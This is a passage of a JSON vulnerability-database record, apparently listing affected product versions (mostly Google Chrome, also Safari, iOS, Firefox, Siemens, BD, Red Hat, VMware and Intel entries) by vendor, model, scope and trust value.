        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.2"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1021"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1688.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.325"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.24"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.5"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.732.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1290.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.26"
      },
      {
        "model": "vcloud usage meter",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.712.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "49.0.2566.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1286.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.152"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.558.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.98"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.28"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.2"
      },
      {
        "model": "simatic ipc827c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.822.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.120"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.665.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.629.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "49"
      },
      {
        "model": "sql server r2 for 32-bit systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "200830"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.339"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.109"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.15"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "31.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.763.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "15.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.112"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.947.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1276.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.168"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.878.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "19.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.42"
      },
      {
        "model": "firefox",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57.0.4"
      },
      {
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.542.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1663.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.48"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.837.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1014"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.529.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.70"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.3.1"
      },
      {
        "model": "simatic ipc847d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.93"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.324"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.929.0"
      },
      {
        "model": "simatic ipc547g",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.510.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.3.1549"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.410.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.787.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.323"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.82"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.292.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.405.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.212.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.684.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.796.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.153.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.35"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.134.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1076.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1307.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.757.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.15"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "facscelesta",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.20"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.5"
      },
      {
        "model": "enterprise linux for ibm z systems extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.55"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.249.78"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.31"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.45"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.118"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.97"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.54"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.40"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "50.0.2661.102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.832.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1066.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.50"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.55"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.702.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.316"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.514.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.221.8"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "24.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.403.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.55"
      },
      {
        "model": "simatic field pg m5",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "43.0.2357"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "33.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.29"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.48"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874102"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.304.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1018.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1278.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.229"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.572.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.36"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.146"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.139"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.22"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.60"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.65"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1282.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.88"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.303.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.80"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.100"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3"
      },
      {
        "model": "pyxis scrubstation system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.26"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "18.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.51"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.20"
      },
      {
        "model": "pyxis anesthesia system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "35000"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.436.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1030.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.44"
      },
      {
        "model": "xeon cpu e5-1650",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "intel",
        "version": "v30"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.340"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.45"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1689.2"
      },
      {
        "model": "enterprise linux server aus",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.889.2"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.1.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "5.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.343"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.531.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.679.0"
      },
      {
        "model": "veritor plus system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.57"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.300"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.893.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.644.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.2"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.173"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
